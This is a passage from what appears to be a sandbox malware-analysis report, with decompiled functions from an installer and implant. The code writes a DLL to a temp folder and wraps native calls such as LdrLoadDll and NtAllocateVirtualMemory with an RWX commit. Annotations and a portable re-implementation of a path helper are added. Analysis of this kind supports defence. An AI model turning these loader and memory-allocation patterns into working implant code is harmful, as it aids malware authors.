                                        • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%
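The root-skipping routine E0040555F above hinges on two magic WORD compares (0x5c3a and 0x5c5c) and on a two-iteration loop whose purpose is not obvious from the decompiled form. As an added example, not code from the page or from the sample, here is a readable re-implementation in portable C that does the same thing on single-byte strings: CharNextA is replaced by a plain pointer increment (so DBCS lead bytes are not handled), and the helper E004054F7 is assumed to be a find-char that returns a pointer to the first match or to the terminating NUL, which is how the decompiled caller treats its result.

```c
#include <stddef.h>
#include <string.h>

/* Added example: portable re-implementation of the decompiled E0040555F.
 * Assumed equivalent of E004054F7: pointer to the first occurrence of c in
 * s, or to the terminating NUL when c is absent. */
static const char *find_char(const char *s, char c)
{
    while (*s != '\0' && *s != c)
        s++;
    return s;
}

/* Return a pointer just past the root component of a Windows path:
 *   "C:\dir\file"           -> "dir\file"   (path[1..2] == ":\", the 0x5c3a compare)
 *   "\\server\share\file"   -> "file"       (path[0..1] == "\\", the 0x5c5c compare)
 *   "relative\file", ""     -> NULL         (no recognised root)
 * A UNC path whose server or share part is not followed by '\' also
 * yields NULL, mirroring the "goto L8" on a NUL result in the loop.
 * Single-byte version: CharNextA is modelled as p + 1. */
const char *skip_root(const char *path)
{
    if (*path == '\0')
        return NULL;

    /* WORD at path[1] == 0x5c3a in little-endian: ':' then '\' */
    if (path[1] == ':' && path[2] == '\\')
        return path + 3;

    /* WORD at path[0] == 0x5c5c: "\\" prefix of a UNC path */
    if (path[0] == '\\' && path[1] == '\\') {
        const char *p = path + 2;            /* _t3 after two CharNextA calls */
        for (int remaining = 2; remaining > 0; remaining--) {
            p = find_char(p, '\\');          /* end of server name, then of share name */
            if (*p == '\0')
                return NULL;                 /* component not terminated by '\' */
            p++;                             /* step over the backslash */
        }
        return p;
    }

    return NULL;
}
```

Run it on the page's own temp path and on a UNC path to see both branches; an unterminated share name yields NULL, which is what lets the caller detect a path without a usable root.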

                                        C-Code - Quality: 61%
                                        			E00401D8E() {
                                        				void* __esi;
                                        				int _t6;
                                        				signed char _t11;
                                        				struct HFONT__* _t14;
                                        				void* _t18;
                                        				void* _t24;
                                        				void* _t26;
                                        				void* _t28;
                                        
                                         				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a); // 0x5a = LOGPIXELSY: vertical DPI of the dialog's display
                                         				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48)); // lfHeight = -MulDiv(point size, dpi, 72), the usual point-to-logical-unit conversion (the decompiler shows the negation as ~); 0x4093d8 is a static LOGFONTA
                                         				 *0x4093e8 = E00402A7D(3); // lfWeight (LOGFONTA offset 0x10)
                                         				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                         				 *0x4093ef = 1; // lfCharSet = DEFAULT_CHARSET
                                         				 *0x4093ec = _t11 & 0x00000001; // lfItalic
                                         				 *0x4093ed = _t11 & 0x00000002; // lfUnderline
                                         				 *0x4093ee = _t11 & 0x00000004; // lfStrikeOut
                                         				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20))); // copy the face name into lfFaceName (offset 0x1c)
                                         				_t14 = CreateFontIndirectA(0x4093d8);
                                         				_push(_t14);
                                         				_push(_t26);
                                         				E0040591D(); // store the HFONT as text via wsprintfA
                                         				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4)); // accumulate the error flag into the global at 0x7a3008
                                         				return 0;
                                        			}

                                        APIs
                                        • GetDC.USER32(?), ref: 00401D95
                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                        • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirect
                                        • String ID:
                                        • API String ID: 3272661963-0
                                        • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                        • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                        • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                        • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				int _t19;
                                        				long _t23;
                                        
                                         				if(_a8 != 0x102) { // not WM_CHAR
                                         					__eflags = _a8 - 2;
                                         					if(_a8 == 2) { // WM_DESTROY: reset the cached value at 0x40929c to -1
                                         						 *0x40929c =  *0x40929c | 0xffffffff;
                                         						__eflags =  *0x40929c;
                                         					}
                                         					__eflags = _a8 - 0x200;
                                         					if(_a8 != 0x200) { // not WM_MOUSEMOVE
                                         						_t23 = _a16;
                                         						goto L9;
                                         					} else {
                                         						_t19 = IsWindowVisible(_a4);
                                         						__eflags = _t19;
                                         						if(_t19 == 0) {
                                         							L12:
                                         							_t23 = _a16;
                                         							L13:
                                         							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23); // forward to the original window procedure saved at 0x79f574 (the window is subclassed)
                                         						}
                                         						_t23 = E00404627(_a4, 1); // value derived from the mouse position by E00404627
                                         						_a8 = 0x419; // re-dispatch it as the private message WM_USER + 0x19
                                         						L9:
                                         						__eflags = _a8 - 0x419;
                                         						if(_a8 == 0x419) {
                                         							__eflags =  *0x40929c - _t23; // 0xffffffff
                                         							if(__eflags != 0) { // value changed since the last message
                                         								 *0x40929c = _t23;
                                         								E004059BF(0x79f580, 0x7a4000);
                                         								E0040591D(0x7a4000, _t23);
                                         								E00401410(6);
                                         								E004059BF(0x7a4000, 0x79f580);
                                         							}
                                         						}
                                         						goto L13;
                                         					}
                                         				}
                                         				if(_a12 == 0x20) { // WM_CHAR with wParam == ' ' (space bar)
                                         					E00403DF3(0x413); // sends the private message WM_USER + 0x13 (see APIs below)
                                         					return 0;
                                         				}
                                         				goto L12;
                                        			}

                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404CE8
                                        • CallWindowProcA.USER32 ref: 00404D56
                                          • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                        • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                        • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                        • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                        				int _t5;
                                        				long _t7;
                                        				struct _OVERLAPPED* _t11;
                                        				intOrPtr* _t15;
                                        				void* _t17;
                                        				int _t21;
                                        
                                        				_t15 = __esi;
                                        				_t11 = __ebx;
                                        				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                        					_t7 = lstrlenA(E00402A9A(0x11));
                                        				} else {
                                        					E00402A7D(1);
                                        					 *0x40a018 = __al;
                                        				}
                                        				if( *_t15 == _t11) {
                                        					L8:
                                        					 *((intOrPtr*)(_t17 - 4)) = 1;
                                        				} else {
                                        					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll", _t7, _t17 + 8, _t11);
                                        					_t21 = _t5;
                                        					if(_t21 == 0) {
                                        						goto L8;
                                        					}
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                        				return 0;
                                        			}

                                        0x0040253c, 0x0040253c, 0x0040253f, 0x0040255a, 0x00402541, 0x00402543, 0x00402548, 0x0040254f, 0x00402561, 0x004026da, 0x004026da, 0x00402567, 0x00402579, 0x004015c8, 0x004015ca, 0x00000000, 0x004015d0, 0x004015ca, 0x00402932, 0x0040293e

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll, xrefs: 00402548, 0040256D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileWritelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                        • API String ID: 427699356-1768735994
                                        • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                        • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                        • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                        • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405513(char* _a4) {
                                        				char* _t3;
                                        				char* _t4;
                                        
                                        				_t4 = _a4;
                                        				_t3 =  &(_t4[lstrlenA(_t4)]);
                                        				while( *_t3 != 0x5c) {
                                        					_t3 = CharPrevA(_t4, _t3);
                                        					if(_t3 > _t4) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				 *_t3 =  *_t3 & 0x00000000;
                                        				return _t3;
                                        			}

                                        0x00405514, 0x0040551e, 0x00405520, 0x00405527, 0x0040552f, 0x00000000, 0x00000000, 0x00000000, 0x0040552f, 0x00405531, 0x00405535

                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                        • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                        • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                        • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405624(CHAR* _a4, CHAR* _a8) {
                                        				int _t10;
                                        				int _t15;
                                        				CHAR* _t16;
                                        
                                        				_t15 = lstrlenA(_a8);
                                        				_t16 = _a4;
                                        				while(lstrlenA(_t16) >= _t15) {
                                        					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                        					_t10 = lstrcmpiA(_t16, _a8);
                                        					if(_t10 == 0) {
                                        						return _t16;
                                        					}
                                        					_t16 = CharNextA(_t16);
                                        				}
                                        				return 0;
                                        			}

                                        0x00405630, 0x00405632, 0x0040565a, 0x0040563f, 0x00405644, 0x0040564f, 0x00000000, 0x0040566c, 0x00405658, 0x00405658, 0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                        • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                        • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                        • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                        • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA$HA
                                        • API String ID: 2738559852-181183267
                                        • Opcode ID: 753c4999f6462e0e777ec3fe4d326bba6abdb323113bb9050810490bf84615d8
                                        • Instruction ID: 2fc6689533634def7b08fd75bee04c37c238bcda15983c85a777cccad901af33
                                        • Opcode Fuzzy Hash: 753c4999f6462e0e777ec3fe4d326bba6abdb323113bb9050810490bf84615d8
                                        • Instruction Fuzzy Hash: FC11F6B6200108AFCB18DF99DC81DEB77A9EF8C314F158649FA1CD7251C634EC518BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA
                                        • API String ID: 2738559852-2163208940
                                        • Opcode ID: 410ed903f88d5c5c52281dc4f4b6a55af454e8bbd433ea66d044455f4a9747de
                                        • Instruction ID: 65a429f643713c0dad0e0c48af134e2cc9fc42039adfe6599b7482ae9991c4bb
                                        • Opcode Fuzzy Hash: 410ed903f88d5c5c52281dc4f4b6a55af454e8bbd433ea66d044455f4a9747de
                                        • Instruction Fuzzy Hash: 5EF0E7B2200108AFCB14CF89CC84EEB77ADEF8C314F058259BA1D97241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA
                                        • API String ID: 2738559852-2163208940
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                        				char* _v8;
                                        				struct _EXCEPTION_RECORD _v12;
                                        				struct _OBJDIR_INFORMATION _v16;
                                        				char _v536;
                                        				void* _t15;
                                        				struct _OBJDIR_INFORMATION _t17;
                                        				struct _OBJDIR_INFORMATION _t18;
                                        				void* _t30;
                                        				void* _t31;
                                        				void* _t32;
                                        
                                        				_v8 =  &_v536;
                                        				_t15 = E0041C650( &_v12, 0x104, _a8);
                                        				_t31 = _t30 + 0xc;
                                        				if(_t15 != 0) {
                                        					_t17 = E0041CA70(__eflags, _v8);
                                        					_t32 = _t31 + 4;
                                        					__eflags = _t17;
                                        					if(_t17 != 0) {
                                        						E0041CCF0( &_v12, 0);
                                        						_t32 = _t32 + 8;
                                        					}
                                        					_t18 = E0041AEA0(_v8);
                                        					_v16 = _t18;
                                        					__eflags = _t18;
                                        					if(_t18 == 0) {
                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                        						return _v16;
                                        					}
                                        					return _t18;
                                        				} else {
                                        					return _t15;
                                        				}
                                        			}

                                        0x0040acec, 0x0040acef, 0x0040acf4, 0x0040acf9, 0x0040ad03, 0x0040ad08, 0x0040ad0b, 0x0040ad0d, 0x0040ad15, 0x0040ad1a, 0x0040ad1a, 0x0040ad21, 0x0040ad29, 0x0040ad2c, 0x0040ad2e, 0x0040ad42, 0x00000000, 0x0040ad44, 0x0040ad4a, 0x0040acfe, 0x0040acfe, 0x0040acfe

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00419D5A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                        				long _t22;
                                        				void* _t33;
                                        
                                        				asm("adc [ecx], ah");
                                        				asm("pushad");
                                        				_t16 = _a4;
                                        				_t3 = _t16 + 0xc40; // 0xc24
                                        				E0041A960(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                        				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                        				return _t22;
                                        			}

                                        0x00419d5c, 0x00419d5e, 0x00419d63, 0x00419d6f, 0x00419d77, 0x00419dad, 0x00419db1

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: f7f07aa86e10515c69ab15f66fc5188e9cb84a4bb2819d01fc2a798a0f0e557b
                                        • Instruction ID: 487103af4664cc5ea782aef0f87b847351b6816358d29a038228fdabc696a9c5
                                        • Opcode Fuzzy Hash: f7f07aa86e10515c69ab15f66fc5188e9cb84a4bb2819d01fc2a798a0f0e557b
                                        • Instruction Fuzzy Hash: 21F031B2214149AFCB05CF98DC84CEB77A9FF8C314B15864DF95D93202D634E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                        				long _t21;
                                        				void* _t31;
                                        
                                        				_t3 = _a4 + 0xc40; // 0xc24
                                        				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                        				return _t21;
                                        			}

                                        0x00419d6f, 0x00419d77, 0x00419dad, 0x00419db1

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                         				long _t14;
                                         				void* _t21;
                                         				intOrPtr _t3;
                                         
                                         				// _a4 is a structure the implant carries around; +0xc60 selects this
                                         				// wrapper's entry in a table at a fixed offset, +0x10 a value kept there,
                                         				// and 0x30 is the constant used for this API (the NtClose wrapper below
                                         				// uses +0xc50 and 0x2c in the same position).
                                         				_t3 = _a4 + 0xc60; // 0xca0
                                         				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                         				// Thin wrapper: the six native parameters are passed straight through.
                                         				// The stack snapshot at the call site (APIs below) is a raw dump, so the
                                         				// mapping to parameters is approximate, but it contains 0x3000
                                         				// (MEM_COMMIT|MEM_RESERVE) and 0x40 (PAGE_EXECUTE_READWRITE), the
                                         				// AllocationType/Protect pair of an RWX commit.
                                         				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                         				return _t14;
                                         			}





                                         Instruction offsets: 0x00419f4f, 0x00419f57, 0x00419f79, 0x00419f7d

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			E00419E90(intOrPtr _a4, void* _a8) {
                                         				long _t8;
                                         				void* _t11;
                                         				intOrPtr _t5;
                                         				intOrPtr* _t2;
                                         				intOrPtr _t3;
                                         
                                         				// Same pattern as E00419F40: a fixed table entry (+0xc50 here, with the
                                         				// constant 0x2c instead of 0x30) is handed to E0041A960 before the
                                         				// native call is made.
                                         				_t5 = _a4;
                                         				_t2 = _t5 + 0x10; // 0x300
                                         				_t3 = _t5 + 0xc50; // 0x40a923
